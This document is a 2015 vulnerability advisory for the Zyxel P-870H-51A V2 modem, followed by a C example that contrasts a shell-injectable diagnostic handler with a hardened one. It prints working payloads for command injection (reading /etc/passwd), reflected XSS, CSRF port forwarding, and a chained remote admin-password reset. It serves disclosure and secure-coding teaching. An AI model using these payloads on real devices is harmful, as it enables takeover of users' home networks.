Vulnerability report: Zyxel P-870H-51A V2

January 11, 2015

This is a vulnerability report for the Zyxel P-870H-51A V2 ADSL2 modem (multiple vulnerabilities).

Technical specifications

  • Product: Zyxel P-870H-51A V2
  • Firmware: 1.01(AWZ.4)
  • Vulnerability type: cross-site request forgery, cross-site scripting, command injection

Disclosure timeline

  • 6th May 2014 - Contacted vendor (never received reply)
  • 28th May 2014 - Contacted NCSC-FI
  • 11th August 2014 - Received reply from NCSC-FI, who had contacted the vendor. The vendor replied that the product is no longer supported and asked that users make sure the firmware is up to date.
  • 12th January 2015 - Public disclosure

Remote Command Execution

Requires that the user is logged in. The command output is shown in the response. Can also be exploited remotely as a CSRF vulnerability (in that case the attacker does not receive the output). A parameter of the diagnostic request is passed to the shell unfiltered, so a semicolon ends the intended command and the attacker's command runs after it:

  ;%20cat%20/etc/passwd&diagTestType=1

Since the default shell of the Linux distribution is very limited, it may be handy to run commands via sh:

  ;%20sh%20-c%20ifconfig%20-a&diagTestType=1

Cross-site scripting

The same diagnostic page reflects the parameter value without escaping. The payload closes the JavaScript string the value lands in and the rest is executed:

  ';alert('xss');//&diagTestType=1

Cross-site request forgery

Can do many actions, such as adding port forwarding rules into the internal network. Just redirect the victim to the following URL (no sessionKey is needed for this request):

  ,&eStart=1234,&eEnd=1234,&iStart=1234,&iEnd=1234,

Requests that trigger “change password” and “reboot” require a sessionKey parameter and thus cannot be forged directly. Let's look again, though: the device contains a non-standard passwd command, which does not ask for the current password:

 > passwd
 Usage: passwd <supervisor|admin|user> <password>
        passwd --help

Hence, by combining the CSRF vulnerability with the command injection, the attacker can remotely change the admin password: the injected request needs no sessionKey, and not seeing the output does not matter:

  ;%20passwd%20admin%20newpasswd
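As an added example (not code from this advisory or from Zyxel), the following C program shows the injection pattern behind the RCE and the CSRF chain above, next to a hardened handler. The vulnerable shape in build_vulnerable_command is an assumption about how a diagnostic CGI pastes a request parameter into a shell command line; handle_diag, is_safe_host, session_key_matches, run_ping and the session key "s3cret" are hypothetical names and values, and the inputs are constructed from the payload shapes on this page. It decodes ";%20cat%20/etc/passwd" into a second command, shows the allowlist rejecting it, and adds the per-request sessionKey check that the forgeable requests on this device lack.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Decode %XX escapes and '+' from a query-string value into dst.
 * Returns the decoded length; output is truncated if dst is too small. */
size_t url_decode(char *dst, size_t dstlen, const char *src) {
    size_t n = 0;
    if (dstlen == 0) return 0;
    for (const char *p = src; *p != '\0' && n + 1 < dstlen; p++) {
        if (*p == '%' && isxdigit((unsigned char)p[1]) && isxdigit((unsigned char)p[2])) {
            char hex[3] = { p[1], p[2], '\0' };
            dst[n++] = (char)strtol(hex, NULL, 16);
            p += 2;
        } else if (*p == '+') {
            dst[n++] = ' ';
        } else {
            dst[n++] = *p;
        }
    }
    dst[n] = '\0';
    return n;
}

/* Vulnerable shape (an assumption about the firmware's CGI, not Zyxel's
 * code): the decoded parameter is pasted into a shell command line. With
 * "; cat /etc/passwd" the ping command ends at ';' and cat runs next.
 * The real defect is the step after this, system(out); it is left out. */
void build_vulnerable_command(char *out, size_t outlen, const char *host) {
    snprintf(out, outlen, "ping -c 3 %s", host);
}

/* Allowlist for a ping target: letters, digits, '.', '-' and ':' only,
 * 1..253 bytes, not starting with '-' (it would parse as a ping option).
 * Shell metacharacters are rejected outright, never escaped. */
int is_safe_host(const char *host) {
    size_t len = strlen(host);
    if (len == 0 || len > 253 || host[0] == '-') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!isalnum(c) && c != '.' && c != '-' && c != ':') return 0;
    }
    return 1;
}

/* Constant-time comparison of the supplied sessionKey with the value
 * stored for the session; returns 1 on match, 0 otherwise. */
int session_key_matches(const char *supplied, const char *expected) {
    size_t a = strlen(supplied), b = strlen(expected);
    unsigned char diff = (unsigned char)(a != b);
    for (size_t i = 0; i < a && i < b; i++)
        diff |= (unsigned char)(supplied[i] ^ expected[i]);
    return diff == 0;
}

typedef enum { DIAG_OK = 0, DIAG_BAD_SESSION = 1, DIAG_BAD_HOST = 2 } diag_status;

/* Hardened handler: every request that runs a command or changes state must
 * carry the per-session key (a forged cross-site request cannot know it),
 * and the target must pass the allowlist. On DIAG_OK, hostbuf holds the
 * decoded host, to be passed to ping as a single argv element. */
diag_status handle_diag(const char *raw_host, const char *session_key,
                        const char *expected_key, char *hostbuf, size_t hostlen) {
    if (!session_key_matches(session_key, expected_key)) return DIAG_BAD_SESSION;
    url_decode(hostbuf, hostlen, raw_host);
    if (!is_safe_host(hostbuf)) return DIAG_BAD_HOST;
    return DIAG_OK;
}

/* Run ping with no shell in between: fork + execvp with an argv array, so
 * the host is one argument and metacharacters in it are inert. */
int run_ping(const char *host) {
    char *argv[] = { "ping", "-c", "1", (char *)host, NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    char cmd[512], host[256];

    /* Constructed input: the page's payload shape, URL-encoded as it is sent. */
    url_decode(host, sizeof host, ";%20cat%20/etc/passwd");
    build_vulnerable_command(cmd, sizeof cmd, host);
    printf("vulnerable command line: %s\n", cmd);

    /* The same payload through the hardened path is rejected before any exec. */
    diag_status st = handle_diag(";%20cat%20/etc/passwd", "s3cret", "s3cret", host, sizeof host);
    printf("injection attempt -> status %d\n", (int)st);

    /* A legitimate target with the right session key runs ping via argv. */
    if (handle_diag("127.0.0.1", "s3cret", "s3cret", host, sizeof host) == DIAG_OK)
        printf("ping exit status: %d\n", run_ping(host));
    return 0;
}
```

The two fixes are independent: the allowlist plus argv exec closes the injection even for a logged-in user, and the sessionKey requirement on every command-running or state-changing request closes the CSRF path, which is exactly the gap the password change above walks through.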

